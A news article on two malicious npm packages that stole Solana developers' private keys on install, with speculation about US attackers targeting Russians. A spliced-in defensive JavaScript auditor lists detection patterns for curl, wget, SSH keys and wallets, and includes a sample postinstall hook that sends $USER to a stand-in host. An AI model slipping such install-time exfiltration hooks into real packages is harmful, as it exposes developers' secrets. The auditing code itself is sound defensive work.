- Researchers discover two packages that carry an infostealer
- The victims appear to be Russian, the attackers American
- This led the researchers to speculate that the targets were Russian hackers
Recently, two malicious packages aimed at software developers in the Solana ecosystem were discovered on the npm package registry.
However, the discovery, the attribution and the likely targets of the malware have led researchers to speculate whether this was a state-sponsored attack.
Solana is a blockchain designed for decentralized applications and cryptocurrencies. It resembles Ethereum in many respects, which is why the crypto community often describes it as the "Ethereum killer".
Aimed at developers? Or hackers? Or both?
Recently, security researchers found two npm packages: "Solana-Pump Test" and "Solana-SPL-SDK".
Both were published by the same author and both contained identical code. According to the researchers, installing either package ran scripts that exfiltrated sensitive information from the compromised device, including private keys that gave the attackers access to the victims' crypto funds.
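The install-time behaviour described above relies on npm lifecycle hooks (preinstall, install, postinstall, prepare), which run arbitrary commands when a package is installed. The following is an added defensive example, not code from the article or from the reported packages: it audits a package manifest for lifecycle hooks and flags ones that download, execute or reference secrets. The manifest and the indicator patterns are constructed for illustration.

```javascript
// Audit a package.json for npm lifecycle scripts, the hook that install-time
// malware abuses to run code on a developer's machine as soon as the package
// is installed. Constructed example; the patterns below are crude heuristics.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators a reviewer would want to look at: network fetches, inline code
// execution, encoding, and references to key material or wallets.
const SUSPICIOUS = [
  /\bcurl\b|\bwget\b/i,        // downloads a payload
  /\bnode\s+-e\b/i,            // inline JavaScript at install time
  /https?:\/\//i,              // hard-coded remote endpoint
  /\bbase64\b/i,               // encoding, often used to hide what is sent
  /\.ssh\b|id_rsa|keypair|wallet/i, // secret or wallet material
];

// Returns one finding per lifecycle hook present in the manifest.
function auditLifecycleScripts(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || cmd.length === 0) continue;
    const indicators = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({ hook, cmd, suspicious: indicators.length > 0, indicators });
  }
  return findings;
}

// Constructed sample manifest (not the real packages' contents): a build step
// plus a postinstall hook that phones home during installation.
const sampleManifest = {
  name: "example-sdk",
  version: "1.0.0",
  scripts: {
    prepare: "tsc -p .",
    postinstall: "curl -s https://example.invalid/telemetry?u=$USER",
    test: "jest",
  },
};

const report = auditLifecycleScripts(sampleManifest);
console.log(JSON.stringify(report, null, 2));
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in `.npmrc`) stops these hooks from executing at all, at the cost of breaking packages that legitimately need them.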
The researchers say the victims, the developers who downloaded and ran the infected packages, were located in Russia.
The attackers, on the other hand, appear to be located in the United States, judging by the IP addresses to which the exfiltrated data was sent.
This was enough for the researchers to ask whether this was a US-backed threat actor targeting Russia, probably because of the currently tense geopolitical relations between the two powers.
But npm, as a platform, is neither Russian nor administered by Russians. The npm registry is run by npm, Inc., a company that was originally independent but is now a subsidiary of GitHub, which is owned by Microsoft.
Even so, Russia has multiple state-sponsored threat actors and affiliates known to go after cryptocurrency users, or after large companies that are then forced to pay ransoms in cryptocurrency. Groups such as Evil Corp, Sandworm and APT28 (Fancy Bear) have been linked to campaigns that steal cryptocurrency or deploy ransomware for financial gain.
So it is not too far-fetched to speculate whether this attack was aimed at crypto hackers as well as at ordinary crypto developers.
Via The Register